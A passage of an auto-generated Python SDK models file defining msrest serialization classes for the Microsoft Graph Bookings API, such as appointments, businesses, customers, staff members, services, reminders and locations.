"""Collection of bookingCustomer.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingCustomer]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingCustomer]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingCustomer"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingCustomer, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingService(msrest.serialization.Model):
"""Collection of bookingService.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingService]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingService]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingService"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingService, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class CollectionOfBookingStaffMember(msrest.serialization.Model):
"""Collection of bookingStaffMember.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param value:
:type value: list[~bookings.models.MicrosoftGraphBookingStaffMember]
:param odata_next_link:
:type odata_next_link: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'value': {'key': 'value', 'type': '[MicrosoftGraphBookingStaffMember]'},
'odata_next_link': {'key': '@odata\\.nextLink', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
value: Optional[List["MicrosoftGraphBookingStaffMember"]] = None,
odata_next_link: Optional[str] = None,
**kwargs
):
super(CollectionOfBookingStaffMember, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.value = value
self.odata_next_link = odata_next_link
class MicrosoftGraphEntity(msrest.serialization.Model):
"""entity.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param id: Read-only.
:type id: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
id: Optional[str] = None,
**kwargs
):
super(MicrosoftGraphEntity, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.id = id
class MicrosoftGraphBookingAppointment(MicrosoftGraphEntity):
"""Represents a booked appointment of a service by a customer in a business.
:param id: Read-only.
:type id: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param additional_information:
:type additional_information: str
:param customer_email_address:
:type customer_email_address: str
:param customer_id: The id of the booking customer associated with this appointment.
:type customer_id: str
:param customer_location: location.
:type customer_location: ~bookings.models.MicrosoftGraphLocation
:param customer_name:
:type customer_name: str
:param customer_notes: Notes from the customer associated with this appointment.
:type customer_notes: str
:param customer_phone:
:type customer_phone: str
:param duration:
:type duration: ~datetime.timedelta
:param end: dateTimeTimeZone.
:type end: ~bookings.models.MicrosoftGraphDateTimeZone
:param invoice_amount:
:type invoice_amount: float
:param invoice_date: dateTimeTimeZone.
:type invoice_date: ~bookings.models.MicrosoftGraphDateTimeZone
:param invoice_id:
:type invoice_id: str
:param invoice_status: Possible values include: "draft", "reviewing", "open", "canceled",
"paid", "corrective".
:type invoice_status: str or ~bookings.models.MicrosoftGraphBookingInvoiceStatus
:param invoice_url:
:type invoice_url: str
:param is_location_online:
:type is_location_online: bool
:param online_meeting_url:
:type online_meeting_url: str
:param opt_out_of_customer_email:
:type opt_out_of_customer_email: bool
:param post_buffer:
:type post_buffer: ~datetime.timedelta
:param pre_buffer:
:type pre_buffer: ~datetime.timedelta
:param price:
:type price: float
:param price_type: Possible values include: "undefined", "fixedPrice", "startingAt", "hourly",
"free", "priceVaries", "callUs", "notSet".
:type price_type: str or ~bookings.models.MicrosoftGraphBookingPriceType
:param reminders:
:type reminders: list[~bookings.models.MicrosoftGraphBookingReminder]
:param self_service_appointment_id:
:type self_service_appointment_id: str
:param service_id: The id of the booking service associated with this appointment.
:type service_id: str
:param service_location: location.
:type service_location: ~bookings.models.MicrosoftGraphLocation
:param service_name: The name of the booking service associated with this appointment.
:type service_name: str
:param service_notes:
:type service_notes: str
:param staff_member_ids:
:type staff_member_ids: list[str]
:param start: dateTimeTimeZone.
:type start: ~bookings.models.MicrosoftGraphDateTimeZone
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'additional_information': {'key': 'additionalInformation', 'type': 'str'},
'customer_email_address': {'key': 'customerEmailAddress', 'type': 'str'},
'customer_id': {'key': 'customerId', 'type': 'str'},
'customer_location': {'key': 'customerLocation', 'type': 'MicrosoftGraphLocation'},
'customer_name': {'key': 'customerName', 'type': 'str'},
'customer_notes': {'key': 'customerNotes', 'type': 'str'},
'customer_phone': {'key': 'customerPhone', 'type': 'str'},
'duration': {'key': 'duration', 'type': 'duration'},
'end': {'key': 'end', 'type': 'MicrosoftGraphDateTimeZone'},
'invoice_amount': {'key': 'invoiceAmount', 'type': 'float'},
'invoice_date': {'key': 'invoiceDate', 'type': 'MicrosoftGraphDateTimeZone'},
'invoice_id': {'key': 'invoiceId', 'type': 'str'},
'invoice_status': {'key': 'invoiceStatus', 'type': 'str'},
'invoice_url': {'key': 'invoiceUrl', 'type': 'str'},
'is_location_online': {'key': 'isLocationOnline', 'type': 'bool'},
'online_meeting_url': {'key': 'onlineMeetingUrl', 'type': 'str'},
'opt_out_of_customer_email': {'key': 'optOutOfCustomerEmail', 'type': 'bool'},
'post_buffer': {'key': 'postBuffer', 'type': 'duration'},
'pre_buffer': {'key': 'preBuffer', 'type': 'duration'},
'price': {'key': 'price', 'type': 'float'},
'price_type': {'key': 'priceType', 'type': 'str'},
'reminders': {'key': 'reminders', 'type': '[MicrosoftGraphBookingReminder]'},
'self_service_appointment_id': {'key': 'selfServiceAppointmentId', 'type': 'str'},
'service_id': {'key': 'serviceId', 'type': 'str'},
'service_location': {'key': 'serviceLocation', 'type': 'MicrosoftGraphLocation'},
'service_name': {'key': 'serviceName', 'type': 'str'},
'service_notes': {'key': 'serviceNotes', 'type': 'str'},
'staff_member_ids': {'key': 'staffMemberIds', 'type': '[str]'},
'start': {'key': 'start', 'type': 'MicrosoftGraphDateTimeZone'},
}
def __init__(
self,
*,
id: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
additional_information: Optional[str] = None,
customer_email_address: Optional[str] = None,
customer_id: Optional[str] = None,
customer_location: Optional["MicrosoftGraphLocation"] = None,
customer_name: Optional[str] = None,
customer_notes: Optional[str] = None,
customer_phone: Optional[str] = None,
duration: Optional[datetime.timedelta] = None,
end: Optional["MicrosoftGraphDateTimeZone"] = None,
invoice_amount: Optional[float] = None,
invoice_date: Optional["MicrosoftGraphDateTimeZone"] = None,
invoice_id: Optional[str] = None,
invoice_status: Optional[Union[str, "MicrosoftGraphBookingInvoiceStatus"]] = None,
invoice_url: Optional[str] = None,
is_location_online: Optional[bool] = None,
online_meeting_url: Optional[str] = None,
opt_out_of_customer_email: Optional[bool] = None,
post_buffer: Optional[datetime.timedelta] = None,
pre_buffer: Optional[datetime.timedelta] = None,
price: Optional[float] = None,
price_type: Optional[Union[str, "MicrosoftGraphBookingPriceType"]] = None,
reminders: Optional[List["MicrosoftGraphBookingReminder"]] = None,
self_service_appointment_id: Optional[str] = None,
service_id: Optional[str] = None,
service_location: Optional["MicrosoftGraphLocation"] = None,
service_name: Optional[str] = None,
service_notes: Optional[str] = None,
staff_member_ids: Optional[List[str]] = None,
start: Optional["MicrosoftGraphDateTimeZone"] = None,
**kwargs
):
super(MicrosoftGraphBookingAppointment, self).__init__(id=id, **kwargs)
self.additional_properties = additional_properties
self.additional_information = additional_information
self.customer_email_address = customer_email_address
self.customer_id = customer_id
self.customer_location = customer_location
self.customer_name = customer_name
self.customer_notes = customer_notes
self.customer_phone = customer_phone
self.duration = duration
self.end = end
self.invoice_amount = invoice_amount
self.invoice_date = invoice_date
self.invoice_id = invoice_id
self.invoice_status = invoice_status
self.invoice_url = invoice_url
self.is_location_online = is_location_online
self.online_meeting_url = online_meeting_url
self.opt_out_of_customer_email = opt_out_of_customer_email
self.post_buffer = post_buffer
self.pre_buffer = pre_buffer
self.price = price
self.price_type = price_type
self.reminders = reminders
self.self_service_appointment_id = self_service_appointment_id
self.service_id = service_id
self.service_location = service_location
self.service_name = service_name
self.service_notes = service_notes
self.staff_member_ids = staff_member_ids
self.start = start
class MicrosoftGraphBookingNamedEntity(MicrosoftGraphEntity):
"""Booking entities that provide a display name.
:param id: Read-only.
:type id: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param display_name: Display name of this entity.
:type display_name: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'display_name': {'key': 'displayName', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
display_name: Optional[str] = None,
**kwargs
):
super(MicrosoftGraphBookingNamedEntity, self).__init__(id=id, **kwargs)
self.additional_properties = additional_properties
self.display_name = display_name
class MicrosoftGraphBookingBusiness(MicrosoftGraphBookingNamedEntity):
"""Represents a Microsot Bookings Business.
:param id: Read-only.
:type id: str
:param display_name: Display name of this entity.
:type display_name: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param address: physicalAddress.
:type address: ~bookings.models.MicrosoftGraphPhysicalAddress
:param business_hours:
:type business_hours: list[~bookings.models.MicrosoftGraphBookingWorkHours]
:param business_type:
:type business_type: str
:param default_currency_iso:
:type default_currency_iso: str
:param email:
:type email: str
:param is_published:
:type is_published: bool
:param phone:
:type phone: str
:param public_url:
:type public_url: str
:param scheduling_policy: This type represents the set of policies that dictate how bookings
can be created in a Booking Calendar.
:type scheduling_policy: ~bookings.models.MicrosoftGraphBookingSchedulingPolicy
:param web_site_url: The URL of the business web site.
:type web_site_url: str
:param appointments: All appointments in this business.
:type appointments: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param calendar_view: A calendar view of appointments in this business.
:type calendar_view: list[~bookings.models.MicrosoftGraphBookingAppointment]
:param customers: All customers of this business.
:type customers: list[~bookings.models.MicrosoftGraphBookingCustomer]
:param services: All services offered by this business.
:type services: list[~bookings.models.MicrosoftGraphBookingService]
:param staff_members: All staff members that provides services in this business.
:type staff_members: list[~bookings.models.MicrosoftGraphBookingStaffMember]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'address': {'key': 'address', 'type': 'MicrosoftGraphPhysicalAddress'},
'business_hours': {'key': 'businessHours', 'type': '[MicrosoftGraphBookingWorkHours]'},
'business_type': {'key': 'businessType', 'type': 'str'},
'default_currency_iso': {'key': 'defaultCurrencyIso', 'type': 'str'},
'email': {'key': 'email', 'type': 'str'},
'is_published': {'key': 'isPublished', 'type': 'bool'},
'phone': {'key': 'phone', 'type': 'str'},
'public_url': {'key': 'publicUrl', 'type': 'str'},
'scheduling_policy': {'key': 'schedulingPolicy', 'type': 'MicrosoftGraphBookingSchedulingPolicy'},
'web_site_url': {'key': 'webSiteUrl', 'type': 'str'},
'appointments': {'key': 'appointments', 'type': '[MicrosoftGraphBookingAppointment]'},
'calendar_view': {'key': 'calendarView', 'type': '[MicrosoftGraphBookingAppointment]'},
'customers': {'key': 'customers', 'type': '[MicrosoftGraphBookingCustomer]'},
'services': {'key': 'services', 'type': '[MicrosoftGraphBookingService]'},
'staff_members': {'key': 'staffMembers', 'type': '[MicrosoftGraphBookingStaffMember]'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
address: Optional["MicrosoftGraphPhysicalAddress"] = None,
business_hours: Optional[List["MicrosoftGraphBookingWorkHours"]] = None,
business_type: Optional[str] = None,
default_currency_iso: Optional[str] = None,
email: Optional[str] = None,
is_published: Optional[bool] = None,
phone: Optional[str] = None,
public_url: Optional[str] = None,
scheduling_policy: Optional["MicrosoftGraphBookingSchedulingPolicy"] = None,
web_site_url: Optional[str] = None,
appointments: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
calendar_view: Optional[List["MicrosoftGraphBookingAppointment"]] = None,
customers: Optional[List["MicrosoftGraphBookingCustomer"]] = None,
services: Optional[List["MicrosoftGraphBookingService"]] = None,
staff_members: Optional[List["MicrosoftGraphBookingStaffMember"]] = None,
**kwargs
):
super(MicrosoftGraphBookingBusiness, self).__init__(id=id, display_name=display_name, **kwargs)
self.additional_properties = additional_properties
self.address = address
self.business_hours = business_hours
self.business_type = business_type
self.default_currency_iso = default_currency_iso
self.email = email
self.is_published = is_published
self.phone = phone
self.public_url = public_url
self.scheduling_policy = scheduling_policy
self.web_site_url = web_site_url
self.appointments = appointments
self.calendar_view = calendar_view
self.customers = customers
self.services = services
self.staff_members = staff_members
class MicrosoftGraphBookingCurrency(MicrosoftGraphEntity):
"""bookingCurrency.
:param id: Read-only.
:type id: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param symbol:
:type symbol: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'symbol': {'key': 'symbol', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
symbol: Optional[str] = None,
**kwargs
):
super(MicrosoftGraphBookingCurrency, self).__init__(id=id, **kwargs)
self.additional_properties = additional_properties
self.symbol = symbol
class MicrosoftGraphBookingPerson(MicrosoftGraphBookingNamedEntity):
"""Represents a booking customer or staff member.
:param id: Read-only.
:type id: str
:param display_name: Display name of this entity.
:type display_name: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param email_address: The e-mail address of this person.
:type email_address: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'email_address': {'key': 'emailAddress', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
email_address: Optional[str] = None,
**kwargs
):
super(MicrosoftGraphBookingPerson, self).__init__(id=id, display_name=display_name, **kwargs)
self.additional_properties = additional_properties
self.email_address = email_address
class MicrosoftGraphBookingCustomer(MicrosoftGraphBookingPerson):
"""Represents a customer of the business.
:param id: Read-only.
:type id: str
:param display_name: Display name of this entity.
:type display_name: str
:param email_address: The e-mail address of this person.
:type email_address: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'email_address': {'key': 'emailAddress', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
email_address: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
**kwargs
):
super(MicrosoftGraphBookingCustomer, self).__init__(id=id, display_name=display_name, email_address=email_address, **kwargs)
self.additional_properties = additional_properties
class MicrosoftGraphBookingReminder(msrest.serialization.Model):
"""This type represents when and to whom to send an e-mail reminder.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param message: Message to send.
:type message: str
:param offset: How much time before an appointment the reminder should be sent.
:type offset: ~datetime.timedelta
:param recipients: Possible values include: "allAttendees", "staff", "customer".
:type recipients: str or ~bookings.models.MicrosoftGraphBookingReminderRecipients
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'message': {'key': 'message', 'type': 'str'},
'offset': {'key': 'offset', 'type': 'duration'},
'recipients': {'key': 'recipients', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
message: Optional[str] = None,
offset: Optional[datetime.timedelta] = None,
recipients: Optional[Union[str, "MicrosoftGraphBookingReminderRecipients"]] = None,
**kwargs
):
super(MicrosoftGraphBookingReminder, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.message = message
self.offset = offset
self.recipients = recipients
class MicrosoftGraphBookingSchedulingPolicy(msrest.serialization.Model):
"""This type represents the set of policies that dictate how bookings can be created in a Booking Calendar.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param allow_staff_selection: Allow customers to choose a specific person for the booking.
:type allow_staff_selection: bool
:param maximum_advance: Maximum number of days in advance that a booking can be made.
:type maximum_advance: ~datetime.timedelta
:param minimum_lead_time: Minimum lead time for bookings and cancellations.
:type minimum_lead_time: ~datetime.timedelta
:param send_confirmations_to_owner: Notify the business via email when a booking is created or
changed.
:type send_confirmations_to_owner: bool
:param time_slot_interval: Duration of each time slot.
:type time_slot_interval: ~datetime.timedelta
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'allow_staff_selection': {'key': 'allowStaffSelection', 'type': 'bool'},
'maximum_advance': {'key': 'maximumAdvance', 'type': 'duration'},
'minimum_lead_time': {'key': 'minimumLeadTime', 'type': 'duration'},
'send_confirmations_to_owner': {'key': 'sendConfirmationsToOwner', 'type': 'bool'},
'time_slot_interval': {'key': 'timeSlotInterval', 'type': 'duration'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
allow_staff_selection: Optional[bool] = None,
maximum_advance: Optional[datetime.timedelta] = None,
minimum_lead_time: Optional[datetime.timedelta] = None,
send_confirmations_to_owner: Optional[bool] = None,
time_slot_interval: Optional[datetime.timedelta] = None,
**kwargs
):
super(MicrosoftGraphBookingSchedulingPolicy, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.allow_staff_selection = allow_staff_selection
self.maximum_advance = maximum_advance
self.minimum_lead_time = minimum_lead_time
self.send_confirmations_to_owner = send_confirmations_to_owner
self.time_slot_interval = time_slot_interval
class MicrosoftGraphBookingService(MicrosoftGraphBookingNamedEntity):
"""Represents a particular service offered by a booking business.
:param id: Read-only.
:type id: str
:param display_name: Display name of this entity.
:type display_name: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param additional_information:
:type additional_information: str
:param default_duration:
:type default_duration: ~datetime.timedelta
:param default_location: location.
:type default_location: ~bookings.models.MicrosoftGraphLocation
:param default_price:
:type default_price: float
:param default_price_type: Possible values include: "undefined", "fixedPrice", "startingAt",
"hourly", "free", "priceVaries", "callUs", "notSet".
:type default_price_type: str or ~bookings.models.MicrosoftGraphBookingPriceType
:param default_reminders: The default reminders set in an appointment of this service.
:type default_reminders: list[~bookings.models.MicrosoftGraphBookingReminder]
:param description:
:type description: str
:param is_hidden_from_customers:
:type is_hidden_from_customers: bool
:param is_location_online:
:type is_location_online: bool
:param notes:
:type notes: str
:param post_buffer:
:type post_buffer: ~datetime.timedelta
:param pre_buffer:
:type pre_buffer: ~datetime.timedelta
:param scheduling_policy: This type represents the set of policies that dictate how bookings
can be created in a Booking Calendar.
:type scheduling_policy: ~bookings.models.MicrosoftGraphBookingSchedulingPolicy
:param staff_member_ids:
:type staff_member_ids: list[str]
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'additional_information': {'key': 'additionalInformation', 'type': 'str'},
'default_duration': {'key': 'defaultDuration', 'type': 'duration'},
'default_location': {'key': 'defaultLocation', 'type': 'MicrosoftGraphLocation'},
'default_price': {'key': 'defaultPrice', 'type': 'float'},
'default_price_type': {'key': 'defaultPriceType', 'type': 'str'},
'default_reminders': {'key': 'defaultReminders', 'type': '[MicrosoftGraphBookingReminder]'},
'description': {'key': 'description', 'type': 'str'},
'is_hidden_from_customers': {'key': 'isHiddenFromCustomers', 'type': 'bool'},
'is_location_online': {'key': 'isLocationOnline', 'type': 'bool'},
'notes': {'key': 'notes', 'type': 'str'},
'post_buffer': {'key': 'postBuffer', 'type': 'duration'},
'pre_buffer': {'key': 'preBuffer', 'type': 'duration'},
'scheduling_policy': {'key': 'schedulingPolicy', 'type': 'MicrosoftGraphBookingSchedulingPolicy'},
'staff_member_ids': {'key': 'staffMemberIds', 'type': '[str]'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
additional_information: Optional[str] = None,
default_duration: Optional[datetime.timedelta] = None,
default_location: Optional["MicrosoftGraphLocation"] = None,
default_price: Optional[float] = None,
default_price_type: Optional[Union[str, "MicrosoftGraphBookingPriceType"]] = None,
default_reminders: Optional[List["MicrosoftGraphBookingReminder"]] = None,
description: Optional[str] = None,
is_hidden_from_customers: Optional[bool] = None,
is_location_online: Optional[bool] = None,
notes: Optional[str] = None,
post_buffer: Optional[datetime.timedelta] = None,
pre_buffer: Optional[datetime.timedelta] = None,
scheduling_policy: Optional["MicrosoftGraphBookingSchedulingPolicy"] = None,
staff_member_ids: Optional[List[str]] = None,
**kwargs
):
super(MicrosoftGraphBookingService, self).__init__(id=id, display_name=display_name, **kwargs)
self.additional_properties = additional_properties
self.additional_information = additional_information
self.default_duration = default_duration
self.default_location = default_location
self.default_price = default_price
self.default_price_type = default_price_type
self.default_reminders = default_reminders
self.description = description
self.is_hidden_from_customers = is_hidden_from_customers
self.is_location_online = is_location_online
self.notes = notes
self.post_buffer = post_buffer
self.pre_buffer = pre_buffer
self.scheduling_policy = scheduling_policy
self.staff_member_ids = staff_member_ids
class MicrosoftGraphBookingStaffMember(MicrosoftGraphBookingPerson):
"""Represents a staff member who provides services in a business.
:param id: Read-only.
:type id: str
:param display_name: Display name of this entity.
:type display_name: str
:param email_address: The e-mail address of this person.
:type email_address: str
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param availability_is_affected_by_personal_calendar:
:type availability_is_affected_by_personal_calendar: bool
:param color_index:
:type color_index: int
:param role: Possible values include: "guest", "administrator", "viewer", "externalGuest".
:type role: str or ~bookings.models.MicrosoftGraphBookingStaffRole
:param use_business_hours:
:type use_business_hours: bool
:param working_hours:
:type working_hours: list[~bookings.models.MicrosoftGraphBookingWorkHours]
"""
_validation = {
'color_index': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'email_address': {'key': 'emailAddress', 'type': 'str'},
'additional_properties': {'key': '', 'type': '{object}'},
'availability_is_affected_by_personal_calendar': {'key': 'availabilityIsAffectedByPersonalCalendar', 'type': 'bool'},
'color_index': {'key': 'colorIndex', 'type': 'int'},
'role': {'key': 'role', 'type': 'str'},
'use_business_hours': {'key': 'useBusinessHours', 'type': 'bool'},
'working_hours': {'key': 'workingHours', 'type': '[MicrosoftGraphBookingWorkHours]'},
}
def __init__(
self,
*,
id: Optional[str] = None,
display_name: Optional[str] = None,
email_address: Optional[str] = None,
additional_properties: Optional[Dict[str, object]] = None,
availability_is_affected_by_personal_calendar: Optional[bool] = None,
color_index: Optional[int] = None,
role: Optional[Union[str, "MicrosoftGraphBookingStaffRole"]] = None,
use_business_hours: Optional[bool] = None,
working_hours: Optional[List["MicrosoftGraphBookingWorkHours"]] = None,
**kwargs
):
super(MicrosoftGraphBookingStaffMember, self).__init__(id=id, display_name=display_name, email_address=email_address, **kwargs)
self.additional_properties = additional_properties
self.availability_is_affected_by_personal_calendar = availability_is_affected_by_personal_calendar
self.color_index = color_index
self.role = role
self.use_business_hours = use_business_hours
self.working_hours = working_hours
class MicrosoftGraphBookingWorkHours(msrest.serialization.Model):
"""This type represents the set of working hours in a single day of the week.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param day: Possible values include: "sunday", "monday", "tuesday", "wednesday", "thursday",
"friday", "saturday".
:type day: str or ~bookings.models.MicrosoftGraphDayOfWeek
:param time_slots: A list of start/end times during a day.
:type time_slots: list[~bookings.models.MicrosoftGraphBookingWorkTimeSlot]
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'day': {'key': 'day', 'type': 'str'},
'time_slots': {'key': 'timeSlots', 'type': '[MicrosoftGraphBookingWorkTimeSlot]'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
day: Optional[Union[str, "MicrosoftGraphDayOfWeek"]] = None,
time_slots: Optional[List["MicrosoftGraphBookingWorkTimeSlot"]] = None,
**kwargs
):
super(MicrosoftGraphBookingWorkHours, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.day = day
self.time_slots = time_slots
class MicrosoftGraphBookingWorkTimeSlot(msrest.serialization.Model):
"""bookingWorkTimeSlot.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param end:
:type end: ~datetime.time
:param start:
:type start: ~datetime.time
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'end': {'key': 'end', 'type': 'time'},
'start': {'key': 'start', 'type': 'time'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
end: Optional[datetime.time] = None,
start: Optional[datetime.time] = None,
**kwargs
):
super(MicrosoftGraphBookingWorkTimeSlot, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.end = end
self.start = start
class MicrosoftGraphDateTimeZone(msrest.serialization.Model):
"""dateTimeTimeZone.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param date_time: A single point of time in a combined date and time representation
({date}T{time}; for example, 2017-08-29T04:00:00.0000000).
:type date_time: str
:param time_zone: Represents a time zone, for example, 'Pacific Standard Time'. See below for
more possible values.
:type time_zone: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'date_time': {'key': 'dateTime', 'type': 'str'},
'time_zone': {'key': 'timeZone', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
date_time: Optional[str] = None,
time_zone: Optional[str] = None,
**kwargs
):
super(MicrosoftGraphDateTimeZone, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.date_time = date_time
self.time_zone = time_zone
class MicrosoftGraphLocation(msrest.serialization.Model):
"""location.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param address: physicalAddress.
:type address: ~bookings.models.MicrosoftGraphPhysicalAddress
:param coordinates: outlookGeoCoordinates.
:type coordinates: ~bookings.models.MicrosoftGraphOutlookGeoCoordinates
:param display_name: The name associated with the location.
:type display_name: str
:param location_email_address: Optional email address of the location.
:type location_email_address: str
:param location_type: Possible values include: "default", "conferenceRoom", "homeAddress",
"businessAddress", "geoCoordinates", "streetAddress", "hotel", "restaurant", "localBusiness",
"postalAddress".
:type location_type: str or ~bookings.models.MicrosoftGraphLocationType
:param location_uri: Optional URI representing the location.
:type location_uri: str
:param unique_id: For internal use only.
:type unique_id: str
:param unique_id_type: Possible values include: "unknown", "locationStore", "directory",
"private", "bing".
:type unique_id_type: str or ~bookings.models.MicrosoftGraphLocationUniqueIdType
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'address': {'key': 'address', 'type': 'MicrosoftGraphPhysicalAddress'},
'coordinates': {'key': 'coordinates', 'type': 'MicrosoftGraphOutlookGeoCoordinates'},
'display_name': {'key': 'displayName', 'type': 'str'},
'location_email_address': {'key': 'locationEmailAddress', 'type': 'str'},
'location_type': {'key': 'locationType', 'type': 'str'},
'location_uri': {'key': 'locationUri', 'type': 'str'},
'unique_id': {'key': 'uniqueId', 'type': 'str'},
'unique_id_type': {'key': 'uniqueIdType', 'type': 'str'},
}
def __init__(
self,
*,
additional_properties: Optional[Dict[str, object]] = None,
address: Optional["MicrosoftGraphPhysicalAddress"] = None,
coordinates: Optional["MicrosoftGraphOutlookGeoCoordinates"] = None,
display_name: Optional[str] = None,
location_email_address: Optional[str] = None,
location_type: Optional[Union[str, "MicrosoftGraphLocationType"]] = None,
location_uri: Optional[str] = None,
unique_id: Optional[str] = None,
unique_id_type: Optional[Union[str, "MicrosoftGraphLocationUniqueIdType"]] = None,
**kwargs
):
super(MicrosoftGraphLocation, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.address = address
self.coordinates = coordinates
self.display_name = display_name
self.location_email_address = location_email_address
self.location_type = location_type
self.location_uri = location_uri
self.unique_id = unique_id
self.unique_id_type = unique_id_type
class MicrosoftGraphOutlookGeoCoordinates(msrest.serialization.Model):
"""outlookGeoCoordinates.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param accuracy: The accuracy of the latitude and longitude. As an example, the accuracy can be
measured in meters, such as the latitude and longitude are accurate to within 50 meters.
:type accuracy: float
:param altitude: The altitude of the location.
:type altitude: float
:param altitude_accuracy: The accuracy of the altitude.
:type altitude_accuracy: float
:param latitude: The latitude of the location.
:type latitude: float
:param longitude: The longitude of the location.
:type longitude: float
